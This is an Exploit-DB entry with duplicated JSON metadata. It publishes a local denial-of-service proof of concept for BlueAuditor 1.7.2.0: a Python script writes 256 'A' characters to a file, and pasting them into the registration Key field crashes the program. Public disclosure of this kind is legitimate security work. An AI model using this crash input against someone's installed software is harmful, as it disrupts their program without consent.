BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
2019-01-07T00:00:00
ID EDB-ID:46087 Type exploitdb Reporter Exploit-DB Modified 2019-01-07T00:00:00
Description
# Exploit Title: BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Tested Version: 1.7.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python BlueAuditor_1.7.2.0.py
# 2.- Open BlueAuditor_1.7.2.0.txt and copy content to clipboard
# 3.- Open BlueAuditor
# 4.- Register -> Enter Registration Code...
# 5.- Name: -> l4m5
# 6.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("BlueAuditor_1.7.2.0.txt", "w")
f.write(buffer)
f.close()
{"id": "EDB-ID:46087", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)", "description": "", "published": "2019-01-07T00:00:00", "modified": "2019-01-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/46087", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-01-07T18:57:08", "viewCount": 7, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-01-07T18:57:08", "rev": 2}, "dependencies": {"references": [], "modified": "2019-01-07T18:57:08", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/46087", "sourceData": "# Exploit Title: BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)\r\n# Discovery by: Luis Martinez\r\n# Discovery Date: 2019-01-04\r\n# Vendor Homepage: www.nsauditor.com\r\n# Software Link : http://www.nsauditor.com/downloads/blueauditor_setup.exe\r\n# Tested Version: 1.7.2.0\r\n# Vulnerability Type: Denial of Service (DoS) Local\r\n# Tested on OS: Windows 10 Pro x64 es\r\n\r\n# Steps to Produce the Crash: \r\n# 1.- Run python code : python BlueAuditor_1.7.2.0.py\r\n# 2.- Open BlueAuditor_1.7.2.0.txt and copy content to clipboard\r\n# 3.- Open BlueAuditor\r\n# 4.- Register -> Enter Registration Code...\r\n# 5.- Name: -> l4m5\r\n# 6.- Paste ClipBoard on \"Key:\"\r\n# 7.- OK\r\n# 8.- Crashed\r\n\r\n#!/usr/bin/env python\r\n \r\nbuffer = \"\\x41\" * 256\r\nf = open (\"BlueAuditor_1.7.2.0.txt\", \"w\")\r\nf.write(buffer)\r\nf.close()", "osvdbidlist": [], "immutableFields": []}